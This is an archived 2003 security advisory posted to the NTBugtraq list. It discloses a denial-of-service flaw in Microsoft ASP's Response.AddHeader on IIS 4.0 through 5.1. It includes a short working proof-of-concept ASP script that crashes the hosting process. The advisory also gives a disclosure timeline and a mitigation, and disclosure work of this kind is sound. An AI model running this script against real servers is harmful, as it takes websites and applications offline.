[prev in list] [next in list] [prev in thread] [next in thread]
List: ntbugtraq
Subject: Microsoft Active Server Pages DoS
From: Parcifal Aertssen <parcifal () AQTRONIX ! COM>
Date: 2003-04-18 22:18:37
[Download RAW message or body]
AQTRONIX Security Advisory AQ-2003-01
=====================================
Topic: Microsoft Active Server Pages DoS
Release date: 18 April 2003
Systems Tested: Windows 2000 Server Family + SP3 + MS02-062
Affected Systems: IIS 4.0, IIS 5.0, IIS 5.1 with ASP 3.0 installed (I did
not test previous versions of ASP).
I also tested ASP.NET but it doesn't seem vulnerable. So all systems with
the "asp.dll" present are vulnerable.
Mitigating factors: in order to execute the exploit a user would need to be
able to upload or change an asp file to the affected server and execute it.
Category: Denial of Service
Vendor URL: http://www.microsoft.com
Author: Parcifal Aertssen
This document (and updates) is available at:
http://www.aqtronix.com/Advisories/AQ-2003-01.txt
Introduction
============
Microsofts Active Server Pages contains a flaw in which you could crash the
ASP Application and use it as a denial of service. A malicious user would
need to be able to upload or change an ASP file and execute it to exploit
this bug.
Details
=======
Microsofts Active Server Pages is a web technology that lets you easily
create dynamic web pages and complete web based applications. It is coded in
a scripting language like VBScript. To work with the web based parts, ASP
adds objects of which you can call functions and set properties. One of
those functions in the Response Object contains a flaw that can be used to
overflow the stack. The function in particular is Response.AddHeader(). This
functions requires a header name and header value as its parameters. If one
of those values is a very long string (more than 350000 characters) the ASP
application will crash as a result of excessive stack usage. The dllhost.exe
process hosting the ASP application will crash, as a result the web site
using that application and other ASP applications in the same pool will also
crash. The next request for the web site will cause the ASP application to
restart (but you lose all application/session state and variables) or if you
have application caching enabled the next request will result in the error
message "The remote procedure call failed and did not execute." or "The RPC
server is unavailable." More request will eventually restart the
application.
Warning: if you run ASP "in-process" then inetinfo.exe will fail, this means
that your complete web server will crash (and restart if you have IIS 5).
Exploit
=======
<%
Dim i, r
For i=1 to 3500
'each time append 100 characters
'line below may wrap
r = r +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa"
Next
Response.AddHeader "random-header:", r 'this is where it crashes
%>
Solution
========
None. You can however limit the DoS by running each ASP application as
"Isolated".
Microsoft told me that this patch was going to be included in the next
cumulative patch, which they would release in February. They didn't, they
said that they still had a lot of testing to do together with the other
issues in the cumulative patch. Since February I haven't heard from them.
History
=======
2002.11.04 Found the vulnerability.
2002.11.07 Mailed it to Microsoft.
2003.01.14 Received private patch which worked.
2003.02.10 Received a mail that they still had a lot of testing to do.
2003.04.18 Released initial advisory
Disclaimer
==========
The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.
AQTRONIX is not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of this
advisory.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Have you discovered a security vulnerability related to Windows or a
commercial product which runs on Windows?
Need assistance crafting the format or translating your advisory to English?
Need to verify it, or having problems contacting the Vendor?
Contact mailto:Advisories@NTBugtraq.com
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic